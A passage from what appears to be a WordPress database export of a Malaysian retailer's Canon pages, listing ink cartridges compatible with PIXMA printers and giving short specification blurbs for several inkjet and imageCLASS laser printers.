width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 15:38:44','2019-09-24 07:38:44','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3297,1,'2019-09-24 15:56:01','2019-09-24 07:56:01','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\nPrint, Scan, Copy\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\nRecommended print volume: 80 - 300 pages\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>Â </p><p>Â </p><center></center><center></center><center></center><center></center><center></center><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops 